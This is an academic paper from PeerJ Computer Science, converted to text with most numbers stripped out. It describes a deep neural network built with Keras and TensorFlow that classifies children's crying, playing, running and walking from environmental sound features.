be found how to cite this article garcía-domínguez a, galvan-tejada ce, zanella-calzada la, gamboa h, galván-tejada ji, celaya padilla jm, luna-garcía h, arceo-olague jg, magallanes-quintanar r. . deep artificial neural network based on environmental sound data for the generation of a children activity classification model. peerj comput. sci. :e doi . /peerj-cs. submitted may accepted october published november corresponding author antonio garcía-domínguez, antonio.garcia@uaz.edu.mx academic editor pinar duygulu additional information and declarations can be found on page doi . /peerj-cs. copyright garcía-domínguez et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:antonio.�garcia@�uaz.�edu.�mx https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ different intelligent systems created to provide services to population. the most recent developments have focused on applications that facilitate the interaction of human beings with their environment, in different areas such as engineering (gupta et al., ; corno & de russis, ), medicine (roda et al., ; ziuziański, furmankiewicz & sołtysik- piorunkiewicz, ), energy (robinson, sanders & mazharsolook, ; cristani, karafili & tomazzoli, ), ambient assisted living (lloret et al., ; blasco et al., ; memon et al., ), among others (al nuaimi et al., ; hu & ni, ). many of the projects developed and implemented in this area rely on human activity recognition (har) systems, which base their operation on the use of different sensors as a data source to determine the activity that a person or group of people are performing and with this information provide some kind of service (alahi et al., ; uddin, ; cippitelli et al., ; burbano & carrera, ; ignatov, ; rafferty et al., ). in works related to human activity recognition and classification, different data sources have been used to collect information about the activity to be analyzed. the most common data sources used are video (caba heilbron et al., ; boufama, habashi & ahmad, ), audio (liang & thomaz, ; galván-tejada et al., ), radio frequency identification (rfid) devices (li et al., ; wang & zhou, ) and smartphones sensors (wang et al., ), such as the accelerometer (lee, yoon & cho, ). another important aspect to consider is the group of people to whom the study is directed, since the type of data source to use, the techniques and algorithms used depend on it. most applications on human activity recognition and classification are designed considering adults as the group of interest (reyes-ortiz et al., ; hammerla, halloran & plötz, ; concone, re & morana, ; brophy et al., ; lyu et al., ). another group of people for which works are commonly developed are the elderly, especially for automatic assisted living and health care (capela, lemaire & baddour, ; sebestyen, stoica & hangan, ; de la concepción et al., ). children are a group for which it is also common to develop applications for monitoring and safety (mannini et al., ; kurashima & suzuki, ; trost et al., ). the children’s activities recognition and classification is a topic that has attracted the attention of many researchers due to the implications and variables involved. there are several factors to consider such as: ( ) number of individuals. the number of children acting simultaneously is undoubtedly an important aspect to be considered, since the complete design of the system changes if activities for , , or a group of children are analyzed. ( ) age of children. because the activities that children perform are related to their age, the set of activities considered for the analysis changes for each defined group of children. ( ) place of analysis of activities. the environment in which the activity analysis is performed is also an important factor to be considered, since there are external factors that can affect some processes (e.g., a noisy environment would affect the data capture process when working on human activity recognition using environmental sound). and ( ) data source. the type of data used for the analysis of activities is a fundamental variable for the system, since its entire design depends on this. if you work garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ with images, audio, video, embedded sensors or audio, the way to act changes in each situation. in the area of children activity recognition and classification common data sources are video cameras, accelerometers and rfid devices (westeyn et al., ; boughorbel et al., ; shoaib et al., ; mannini et al., ). most of the works presented in this area perform the data capture process using wearable sensors, making it possible to identify types of disadvantages: . interference with the children’s natural behavior. wearing wearable sensors can cause the children, by their curious instincts, to become distracted by feeling a foreign object to him and not perform activities normally (e.g., crying because they want to remove the sensor). this type of behavior would cause an alteration in the captured data or that these were not representative of the activities commonly performed by the children and that are being subject to analysis. . possible physical damage to sensors. the fact that the sensor is located in one of the clothes or parts of the children’s body makes possible the risk that the sensor may suffer physical damage while the children perform the activities, because they are unpredictable (e.g., to wet or hit a smart watch). the sensors are generally not made for rough use, so improper use or even physical damage could represent inappropriate data capture for the system. to mitigate the problem of using wearable sensors, it is necessary to use a different data source that does not interfere with the analyzed activities, for this purpose sound has been used in some works as data source (galván-tejada et al., ; sim, lee & kwon, ). capturing audio data has the advantage that the capture device does not necessarily have to be carried by the individual who is performing the activity, but can be located in a nearby place where it does not interfere with the performed activities. in addition, it is not necessary to use special equipment or sensors to capture data, since it is possible to use the microphone present in smartphones. machine learning is a branch of artificial intelligence that, since its appearance, has been applied to a wide variety of problems due to the good results it has shown in terms of data analysis, especially in classification problems, such as the presented in this work. machine learning has the particularity of being able to be applied to an endless number of problems, with different types of data to analyze. different applications based on machine learning for the analysis of audio data have been developed, among the main commercial applications developed are voice assistants, such as alexa (hoy, ; kepuska & bohouta, ), siri (aron, ; kepuska & bohouta, ) and cortana (bhat, lone & paul, ; hoy, ), for the amazon, apple and microsoft companies respectively, as well as google’s voice assistant (lópez, quesada & guerrero, ). in machine learning, specifically deep neural networks have also been widely used for analysis of audio data, as in wavenet (van der oord et al., ), a deep neural network for generating raw audio waveforms. it is also common to find works based on machine garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ learning focused on audio data classification (zhang et al., ; zeng et al., ; lu, zhang & nayak, ; piczak, ; rong, ; hershey et al., ). for the generation of a human activity recognition and classification model, it is necessary to implement a machine learning classification algorithm (jordan & mitchell, ; nikam, ; fatima & pasha, ), which after being trained with a set of training data, is able to classify new data among the analyzed classes. some of the most commonly used classification algorithms in this area are support vector machine (svm) (chen et al., ), k-nearest neighbor (knn) (paul & george, ), random forests (rf) (uddin, billah & hossain, ), extra trees (et) (uddin & uddiny, ) and artificial neural networks (ann) (ronao & cho, ; suto & oniga, ; murad & pyun, ). in recent years there have been numerous works based on ann focused on the creation of activity recognition models, due to the performance and efficiency they have shown (ronao & cho, ; hassan et al., ; jiang & yin, ; nweke et al., ; lubina & rudzki, ; myo, wettayaprasit & aiyarak, ). the accuracy of the classifier model depends on the algorithm used and the analyzed data. when working with audio, it is possible to extract features of the signals to serve as input for the classification algorithms. the number and type of features extracted depends on the application and the type of analysis to be performed. previously, we presented a work that implemented the classification algorithms svm, knn, random forests, extra trees and gradient boosting in the generation of a children activity classification model using environmental sound data, working with a -feature set extracted from the audios samples, and the classifier that achieves a higher accuracy was knn with % (blanco-murillo et al., ). in addition, a work was previously presented where the same classification algorithms mentioned above were analyzed and a -feature subset was used for the generation of the models, achieving accuracies greater than % (garca-domnguez et al., ). continuing the previous works, we also developed a children activity recognition and classification model using environmental sound through a -feature subset, chosen by genetic algorithms. in that work, the same classifying algorithms mentioned in the previous works were used and the maximum accuracy obteined was % (garca-dominguez et al., ). in the present work, the architecture of a deep ann is proposed for its implementation as machine learning algorithm in the generation of a children activity recognition model using environmental sound, in an environmental noise-free environment and analyzing activities of children acting individually. a -feature set is extracted from the analyzed dataset, which is used in the generation of the model. the classification model is trained and evaluated in terms of accuracy to obtain the performance of the classification algorithm. two validation approaches are used: – split ( % of the data for training and % for testing), and a k-fold cross validation. this document is organized as follows: the materials and methods are described in detail in “materials and methods”. in “experiments and results” the experiments performed and the results obtained are reported. the discussion and conclusions are described in “conclusions”. finally, future work is presented in “future work”. garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ materials and methods this section describes in detail the used dataset, made up of audio recordings of the different activities to be analyzed, as well as the extracted features used to generate the classification model. likewise, the methodology used throughout the experimentation is described. for the design and implementation of the deep ann presented in this work, the python programming language is used (van rossum, ), through the keras (chollet, ) library, an api (application programming interface) of high-level ann, and the tensorflow abadi et al. ( ) library, which is the most widely used deep learning platform today. dataset description the data set used for this work is the same as the used in previous works about children activity recognition (garca-domnguez et al., , ) and no extra processing was done. the audios analyzed belong to four different activities, shown in table . as shown in delgado-contreras et al. ( ), tarzia et al. ( ), -s audio clips seem to be long enough to obtain potentially useful information in the process of classifying activities by analyzing environmental sound. in the dataset used, the audio recordings with a duration greater than s were divided to generate a greater number of samples. for the analysis of the activities, -s samples are taken. each of the audio recordings in the dataset used belongs to a single activity, so the produced -s clips also belong to a single activity. table shows the number of audio recordings and -s samples that the dataset has for each activity to be analyzed. as shown in table , the dataset used for the presented work consists of , -s audio clips and the amount of audios per class is balanced ( . %, . %, . % and . % crying, playing, running and walking, respectively). there is no rule to define the table general description of activities. activity description crying emitting crying sound in reaction to some event playing handling plastic pieces running moving quickly from one place to another walking moving from one place to another at medium speed table recordings and audio clips per activity. activity generated taken from internet total recordings clips recordings clips recordings clips crying playing running walking garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ minimum size of a dataset analyzed using machine learning techniques, the only general recommendation is that it be as large as possible, but that is in particular for each case and type of generated model (e.g., barbedo ( ) analyzed the size of the dataset for plant disease classification, dutta & gros ( ) did it for the classification of medical images and oyedare (oyedare & park, ) did it for the classification of transmitters through deep learning). and precisely one of the points to perform as future work for the present work is an analysis of the dataset and consider expanding it if necessary. for the feature extraction process, a set of numerical features are extracted from the -s intervals of the audio signals, these features are shown in table . these extracted features are those commonly used in audio analysis and activity recognition through audio (scheirer, ; wang et al., ), especially the mel-frequency spectral coefficients, since many audio analysis works that make use of them have been developed (galván-tejada et al., ; stork et al., ; mascia et al., ). this set of features was extracted using python programming language (van rossum, ). artificial neural networks an ann is a model based on the neural structure of the brain, which basically learns from experience. this type of models learn to perform tasks using sample data, without the need to be programed with a specific task. an ann is composed by nodes called neurons connected to each other. each of these connections, called edges, are channels that can transmit information from one neuron to another (monteiro et al., ). these edges, regularly, are associated with a real number, called weight, which increases or decreases the signal that passes through the edges and affects the input to the next neuron. the way to calculate the output of the neurons is by some non-linear function of the sum of their inputs. in fig. the parts of an artificial neuron are shown, the inputs are represented by xi, and the weights associated with each edge by wi, also within the neuron the transfer and activation functions with which the output is calculated are represented. table extracted features. feature id feature name zero crossing rate energy entropy of energy spectral centriod spectral spread spectral entropy spectral flux spectral rollof – mfccs – chroma vector chroma deviation garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ann are made up of layers, which can have different types of transformations in their inputs. there are two fully identified layers: the input layer and the output layer (kia et al., ). therefore, the data travels from the input layer to the output layer, going through the different intermediate layers, called hidden layers. figure shows an example of a simple ann. the number of nodes in the input layer is determined by the number of input data (monteiro et al., ). the data is processed in the hidden layers and the output layer. there is no fixed or recommended number for hidden layers or for their number of nodes, they are regularly tested by trial and error, depending on the application for which the ann is being designed. when the number of hidden layers is large, as well as the number of nodes in them, it is said that there is a deep ann. in the same way, the number of nodes in the output layer is determined by the problem to which the ann applies, in figure parts of an artificial neuron (xi represents the inputs, wi represents the weights). full-size doi: . /peerj-cs. /fig- figure example of an ann. full-size doi: . /peerj-cs. /fig- garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ multiclass problems the number of nodes in the output layer corresponds to the number of classes to predict. deep artificial neural network architecture the ann architecture definition refers to the structure of the number of layers and nodes contained. there are not strict rules to define the number of hidden layers and the number of nodes, that depends on the problem in which the ann is implemented and this data is determined by trial and error. one way to select the parameters of ann, such as the number of nodes and hidden layers, has been to adjust them manually or relying on very deep networks (simonyan & zisserman, ) that have proved effective in other applications, with the disadvantage of the cost in memory that it implies that the ann is not optimized for the particular problem and some of these parameters can be redundant (alvarez & salzmann, ). neural network model an ann model is composed by four mainly concepts described in detail below. type of model when using the keras interface for the implementation of an ann in python, it is necessary to specify the type of model to be created. there are two ways to define keras models: sequential and functional (ketkar, ). a sequential model refers to the fact that the output of each layer is taken as the input of the next layer, and it is the type of model developed in this work. activation function the activation function is responsible for returning an output from an input value, usually the set of output values in a given range such as ( , ) or (− , ). the types of activation functions most commonly used in ann are: � sigmoid: this function transforms the values entered to a scale ( , ), where high values tend asymptotically to and very low values tend asymptotically to (karlik & olgac, ), as shown in eq. ( ). f ðxÞ ¼ � e�x ( ) � relu-rectified linear unit: this function transforms the entered values by canceling the negative values and leaving the positive ones as they enter (yarotsky, ), as shown in eq. ( ). f ðxÞ ¼ maxð ; xÞ ¼ � for x , x for x � � ( ) � softmax: this function transforms the outputs into a representation in the form of probabilities, such that the sum of all the probabilities of the outputs is . it is used to normalize multiclass type (liu et al., ), as shown in eq. ( ). garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ f ðzÞj ¼ ezjpk k¼ e zk ( ) optimization algorithm the goal of optimization algorithms is to minimize (or maximize) an objective e(x) function that is simply a mathematical function that depends on the internal learning parameters of the model that are used to calculate the objective (y) values of the set of predictors (x) used in the model. the most commonly used optimization algorithms in ann are gradient descent and adam (ruder, ; kingma & ba, ). loss function the loss function, also known as the cost function, is the function that indicates how good the ann is. a high result indicates that the ann has poor performance and a low result indicates that the ann is performing positively. this is the function that is optimized or minimized when back propagation is performed. there are several mathematical functions that can be used, the choice of one depends on the problem that is being solved. some of these functions are: � cross-entropy: cross-entropy loss, or log loss, measures the performance of a classification model whose output, y, is a probability value, p, between and , and it is calculated with eq. ( ). cross-entropy loss increases as the predicted probability diverges from the actual label. this function is used for classification problems (rubinstein & kroese, ). �ðy logðpÞ þ ð � yÞ logð � pÞÞ ( ) � categorical cross-entropy: also called softmax loss (koidl, ). it is a softmax activation plus a cross-entropy loss and it is calculated with eq. ( ), where the double sum is over the observations i, whose number is n, and the categories c, whose number is c. the term yi ∈ cc is the indicator function of the ith observation belonging to the cth category. the pmodel[yi ∈ cc] is the probability predicted by the model for the ith observation to belong to the cth category. when there are more than two categories, the ann outputs a vector of c probabilities, each giving the probability that the network input should be classified as belonging to the respective category. when the number of categories is just two, the neural network outputs a single probability ŷi, with the other one being minus the output. this is why the binary cross entropy looks a bit different from categorical cross entropy, despite being a special case of it. � n xn i¼ xc c¼ yi cc log pmodel yi cc½ � ( ) � mean squared error: mean square error (mse) is the most commonly used regression loss function (christoffersen & jacobs, ). mse is the sum of squared distances garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ between our target variable and predicted values, and it is calculated with eq. ( ), where n represents the number of samples and ŷi represents the predicted value. mse ¼ pn i¼ ðyi � ŷiÞ n ( ) experiments and results the dataset used in this work is contained by , -s audio samples, with extracted features from each sample. two validation approaches were used: – split and a k-fold cross validation. for the – split approach, a training subset and a testing subset are randomly selected, contained by % and % of the data, respectively (the approach of % for training and % for testing is used in this area as valid, as proposed by balli, sağbaș & peker ( ), taylor et al. ( ) and sousa lima et al. ( )). table shows the number of audio samples in each subset for this case. for the k-fold cross-validation, k = was selected, since it is an approach used in works on human activity recognition to estimate an average accuracy and evaluate the model performance, as in the works presented by altun & barshan ( ), dehghani, glatard & shihab ( ), and jordao et al. ( ). table shows the number of audio samples in the training and test subsets using the -fold cross-validation approach. the ann architecture is the most important aspect to define, since it directly impacts the accuracy achieved by the network. as mentioned earlier, there are no rules to choose the parameters of the architecture since these are conditioned to the type of application that is given to the ann and they are determined by trial and error. table shows the proposed architecture of the deep ann used in this work. the selected parameters for the ann architecture, as well as the characteristics of the dataset (classes balanced in quantity, proportion of the size of the testing and training subsets, number of features), ensure that no overfitting appears for the generated model, based on the obtained results, so no dropout layers were used. in table the selected parameters for the development and implementation of the model in the keras interface with python are presented. for the choice of the used parameters in the model implementation, those that best adapt to the type of problem in which they are being applied (multiclass classification) were taken and some of them are present by default in the keras interface, considering that they are generally the ones that achieve the best performing (e.g., the relu activation function is the most successful and widely used activation function (ramachandran, zoph & le, )). the ann model created with the described architecture and parameters was implemented, executed and validated in the python programming language. as mentioned above, two validation approaches were used to evaluate the performance of the model. for the – split approach, fig. shows the accuracy achieved by the model over epochs, where can be observed that the accuracy achieved for the classification of children’s activities using environmental sound is . for training data and . for testing data. garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in fig. it can be observed that the curves representing the model accuracy (training and testing accuracy) periodically spikes down, which is a consequence of the training process being stuck in local regions, due to the optimization parameters used (the adam table size of training and test data sets for the – validation approach. total samples training data samples test data samples , , table size of training and test data sets for the -fold cross-validation approach. total samples training data samples test data samples , , table proposed ann architecture. inputs hidden layers neurons per layer outputs batch size epochs table selected model parameters. type of model sequential input layer activation function relu hidden layers activation function relu output layer activation function softmax loss function categorical crossentropy optimization algorithm adam figure accuracy behavior during ann training and testing for the – split approach. full-size doi: . /peerj-cs. /fig- garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ optimization function was used, with the default parameters (keras team, ). figure shows the loss presented by the ann, where can be observed that the loss for the training data is . , while for the testing data is . , which is related to the general evaluation of the ann and indicates how good it is for the classification. in fig. it can be observed that the curves representing the model loss (training and testing loss) present irregular spikes, which is due properly to the shape of the analyzed data and the parameters chosen in the network architecture, specifically the adam optimization function, as mentioned above. from the results obtained by executing the classification model with the – split approach, it is also possible to analyze the behavior of the model specifically for each of the activities analyzed in this work. table shows the confusion matrix generated from the execution of the classification model for the testing data. in the confusion matrix it is possible to observe the number of correctly classified audio samples for each activity and the number of wrongly classified samples. for the set of activities analyzed, the crying activity is the one that the model classifies in the best way, with . % accuracy ( of samples correctly classified). for the second model validation approach, the -fold cross-validation, table shows the accuracy and loss obtained for each fold and table shows the average scores for all figure loss function behavior during ann training and validation. full-size doi: . /peerj-cs. /fig- table confusion matrix for the activity classification model. cry play run walk cry play run walk garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ folds. in both validation processes of the child activity classification model ( – division approach and -fold cross-validation) it can be observed that the accuracy is very similar. discussion although the substantial contribution of the present work is the presentation of a deep artificial neural network in the generation of a children activity classification model through environmental sound, there are aspects to be considered, such as the fact that the proposed architecture is specific for this model and is susceptible to being optimized. the activities are independent of each other, that is, the analysis does not consider activities that are performed simultaneously. composite activities would thus require a different analysis to be considered. another important point is the type of environmental sound with which one works, since this work is based on the fact that the captured audio corresponds to activities performed in environments with little or no external noise, and where only one individual (child) is performing an activity at the same time. environments with considerable external noise or with several individuals (children) interacting at the same time would require another type of analysis. it is also important to highlight that the results obtained in terms of accuracy for the two model validation approaches implemented in this work are similar, which confirms the performance of the model in the children activity classification using environmental sound. table scores per fold in the -fold cross-validation approach. fold accuracy (%) loss . . . . . . . . . . . . . . . . . . . . table average scores for all folds in the -fold cross-validation approach. accuracy (%) loss . . garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ conclusions the aim of the present work was to create a children activity classification model using environmental sound as data source, through the design of a deep ann, a well-known machine learning technique through which it is possible to generate activity recognition models, with significant accuracy. from the results shown in “experiments and results”, the following conclusions can be obtained: � environmental sound can be used to correctly classify children activities. environmental sound is an effective data source for the generation of models for children activity classification, since it is possible to classify activities based on the analysis of the extracted features from the environmental sound. � different-type activities are correctly classified. the model correctly classifies activities of different types such as crying, playing, running and walking, unlike other models based on specific types of sensors (e.g., using accelerometers only for activities detectable by movement). � deep artificial neural networks are efficient in generating children activity classification models through environmental sound. the deep artificial neural network with the proposed architecture correctly classifies children activities with an accuracy of %, through the analysis of the extracted features from the environmental sound. � the accuracy of the deep artificial neural network is similar to other machine learning techniques reported. the deep artificial neural network with the architecture proposed in the present work achieves an accuracy similar to that reported in our previous works, with other machine learning techniques: % for knn with features (blanco- murillo et al., ) and . % for knn with features (garca-domnguez et al., ). future work the present work allows us to demonstrate that a deep artificial neural network is an efficient technique in the generation of a children activity classification model, however, some aspects can be worked on in the future. therefore, we propose as part of future work the analysis of the parameters described in the architecture of the neural network, as well as the consideration of feature selection techniques for the dataset. as for the set of activities analyzed, we also propose as future work the addition of more simple activities, as well as the proposal for the analysis of compound activities, both in controlled and uncontrolled environments. the proposed future work is: � to analyze the parameters described in the architecture of the proposed deep artificial neural network with the aim of performing an optimization that allows increasing the accuracy in the classification of the activities. � to include feature selection techniques to reduce the size of the dataset with which the deep artificial neural network works and this can favorably impact the performance garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of the model. this is important especially when working with models that are implemented in mobile devices with limited resources. � to analyze the dataset size and the number of instances per class to ensure optimal training of the model and expand it if necessary. � to increase the set of activities analyzed by adding additional activities that are performed by children, which will allow the model to be more robust. � to propose the type of analysis to be performed in the case of compound activities. � to analyze the methods and techniques to be used to classify children activities through environmental sound in uncontrolled environments with outside noise. � to design a practical application on a specific scenario where the generated classification model can be applied considering the points to work mentioned above. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � antonio garcía-domínguez conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/ or tables, authored or reviewed drafts of the paper, and approved the final draft. � carlos e. galvan-tejada conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. � laura a. zanella-calzada conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. � hamurabi gamboa performed the experiments, analyzed the data, prepared figures and/ or tables, and approved the final draft. � jorge i. galván-tejada analyzed the data, prepared figures and/or tables, and approved the final draft. � josé maría celaya padilla analyzed the data, performed the computation work, prepared figures and/or tables, and approved the final draft. � huizilopoztli luna-garcía performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � jose g. arceo-olague performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. � rafael magallanes-quintanar performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data availability the following information was supplied regarding data availability: raw data are available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abadi m, barham p, chen j, chen z, davis a, dean j, devin m, ghemawat s, irving g, isard m, kudlur m, levenberg j, monga r, moore s, murray dg, steiner b, tucker p, vasudevan v, warden p, wicke m, yu y, zheng x, brain g. . tensorflow: a system for large-scale machine learning. in: th usenix symposium on operating systems design and implementation (osdi ), – . al nuaimi e, al neyadi h, mohamed n, al-jaroodi j. . applications of big data to smart cities. journal of internet services and applications ( ): doi . /s - - - . alahi a, goel k, ramanathan v, robicquet a, fei-fei l, savarese s. . social lstm: human trajectory prediction in crowded spaces. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . albino v, berardi u, dangelico rm. . smart cities: definitions, dimensions, performance, and initiatives. journal of urban technology ( ): – doi . / . . . altun k, barshan b. . human activity recognition using inertial/magnetic sensor units. in: international workshop on human behavior understanding, springer, – . alvarez jm, salzmann m. . learning the number of neurons in deep networks. in: advances in neural information processing systems, – . arasteh h, hosseinnezhad v, loia v, tommasetti a, troisi o, shafie-khah m, siano p. . iot-based smart cities: a survey. in: ieee th international conference on environment and electrical engineering (eeeic). piscataway: ieee, – . aron j. . how innovative is apple’s new voice assistant, siri? new scientist. ( ): . balli s, sağbaș ea, peker m. . human activity recognition from smart watch sensor data using a hybrid of principal component analysis and random forest algorithm. measurement and control ( – ): – . barbedo jga. . impact of dataset size and variety on the effectiveness of deep learning and transfer learning for plant disease classification. computers and electronics in agriculture : – doi . /j.compag. . . . bhat hr, lone ta, paul zm. . cortana-intelligent personal digital assistant: a review. international journal of advanced research in computer science ( ): – . blanco-murillo dm, garcía-domínguez a, galván-tejada ce, celaya-padilla jm. . comparación del nivel de precisión de los clasificadores support vector machines, k nearest neighbors, random forests, extra trees y gradient boosting en el reconocimiento de actividades infantiles utilizando sonido ambiental. research in computing science ( ): – doi . /rcs- - - . blasco r, marco Á, casas r, cirujano d, picking r. . a smart kitchen for ambient assisted living. sensors ( ): – doi . /s . garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / . . http://dx.doi.org/ . /j.compag. . . http://dx.doi.org/ . /rcs- - - http://dx.doi.org/ . /s http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ boufama b, habashi p, ahmad is. . trajectory-based human activity recognition from videos. in: international conference on advanced technologies for signal and image processing (atsip). piscataway: ieee, – . boughorbel s, breebaart j, bruekers f, flinsenberg i, kate wt. . child-activity recognition from multi-sensor data. in: proceedings of the th international conference on methods and techniques in behavioral research-mb . brophy e, muehlhausen w, smeaton af, ward te. . optimised convolutional neural networks for heart rate estimation and human activity recognition in wrist worn sensing applications. arxiv. available at https://arxiv.org/abs/ . . burbano d, carrera jl. . human activity recognition in a car with embedded devices. latin american journal of computing faculty of systems engineering escuela politécnica nacional quito-ecuador ( ): – . caba heilbron f, escorcia v, ghanem b, carlos niebles j. . activitynet: a large-scale video benchmark for human activity understanding. in: proceedings of the ieee conference on computer vision and pattern recognition. piscataway: ieee, – . capela na, lemaire ed, baddour n. . feature selection for wearable smartphone-based human activity recognition with able bodied, elderly, and stroke patients. plos one ( ): e doi . /journal.pone. . chen z, zhu q, soh yc, zhang l. . robust human activity recognition using smartphone sensors via ct-pca and online svm. ieee transactions on industrial informatics ( ): – doi . /tii. . . chollet f. . keras: the python deep learning library. houghton: astrophysics source code library. christoffersen p, jacobs k. . the importance of the loss function in option valuation. journal of financial economics ( ): – doi . /j.jfineco. . . . cippitelli e, gasparrini s, gambi e, spinsante s. . a human activity recognition system using skeleton data from rgbd sensors. computational intelligence and neuroscience : . concone f, re gl, morana m. . a fog-based application for human activity recognition using personal smart devices. acm transactions on internet technology (toit) ( ): – doi . / . cook dj, augusto jc, jakkula vr. . ambient intelligence: technologies, applications, and opportunities. pervasive and mobile computing ( ): – doi . /j.pmcj. . . . corno f, de russis l. . training engineers for the ambient intelligence challenge. ieee transactions on education ( ): – doi . /te. . . cristani m, karafili e, tomazzoli c. . improving energy saving techniques by ambient intelligence scheduling. in: ieee th international conference on advanced information networking and applications. piscataway: ieee, – . de la concepción mÁÁ, morillo lms, garca jaÁ, gonzález-abril l. . mobile activity recognition and fall detection system for elderly people using ameva algorithm. pervasive and mobile computing : – doi . /j.pmcj. . . . dehghani a, glatard t, shihab e. . subject cross validation in human activity recognition. arxiv. available at http://arxiv.org/abs/ . . delgado-contreras jr, garća-vázquez jp, brena rf, galván-tejada ce, galván-tejada ji. . feature selection for place classification through environmental sounds. procedia computer science : – . garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://arxiv.org/abs/ . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /tii. . http://dx.doi.org/ . /j.jfineco. . . http://dx.doi.org/ . / http://dx.doi.org/ . /j.pmcj. . . http://dx.doi.org/ . /te. . http://dx.doi.org/ . /j.pmcj. . . http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dutta s, gros e. . evaluation of the impact of deep learning architectural components selection and dataset size on a medical imaging task. in: medical imaging : imaging informatics for healthcare, research, and applications, international society for optics and photonics, : . fatima m, pasha m. . survey of machine learning algorithms for disease diagnostic. journal of intelligent learning systems and applications ( ): – doi . /jilsa. . . galván-tejada ce, galván-tejada ji, celaya-padilla jm, delgado-contreras jr, magallanes-quintanar r, martinez-fierro ml, garza-veloz i, lópez-hernández y, gamboa-rosales h. . an analysis of audio features to develop a human activity recognition model using genetic algorithms, random forests, and neural networks. mobile information systems : doi . / / . garca-dominguez a, galván-tejada ce, zanella-calzada la, gamboa-rosales h, galván-tejada ji, celaya-padilla jm, luna-garca h, magallanes-quintanar r. . feature selection using genetic algorithms for the generation of a recognition and classification of children activities model using environmental sound. mobile information systems : doi . / / . garca-domnguez a, zanella-calzada la, galván-tejada ce, galván-tejada ji, celaya-padilla jm. . evaluation of five classifiers for children activity recognition with sound as information source and akaike criterion for feature selection. in: mexican conference on pattern recognition, berlin: springer, – . gupta a, pandey oj, shukla m, dadhich a, ingle a, gawande p. . towards context-aware smart mechatronics networks: integrating swarm intelligence and ambient intelligence. in: international conference on issues and challenges in intelligent computing techniques (icict). piscataway: ieee, – . hammerla ny, halloran s, plötz t. . deep, convolutional, and recurrent models for human activity recognition using wearables. available at https://arxiv.org/abs/ . . hassan mm, uddin mz, mohamed a, almogren a. . a robust human activity recognition system using smartphone sensors and deep learning. future generation computer systems : – doi . /j.future. . . . hershey s, chaudhuri s, ellis dp, gemmeke jf, jansen a, moore rc, plakal m, platt d, saurous ra, seybold b, slaney m, weiss rj, wilson k. . cnn architectures for large-scale audio classification. in: ieee international conference on acoustics, speech and signal processing (icassp). piscataway: ieee, – . hoy mb. . alexa, siri, cortana, and more: an introduction to voice assistants. medical reference services quarterly ( ): – doi . / . . . hu l, ni q. . iot-driven automated object detection algorithm for urban surveillance systems in smart cities. ieee internet of things journal ( ): – doi . /jiot. . . ignatov a. . real-time human activity recognition from accelerometer data using convolutional neural networks. applied soft computing : – doi . /j.asoc. . . . jiang w, yin z. . human activity recognition using wearable sensors by deep convolutional neural networks. in: proceedings of the rd acm international conference on multimedia. new york: acm, – . jordan mi, mitchell tm. . machine learning: trends, perspectives, and prospects. science ( ): – doi . /science.aaa . garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /jilsa. . http://dx.doi.org/ . / / http://dx.doi.org/ . / / https://arxiv.org/abs/ . http://dx.doi.org/ 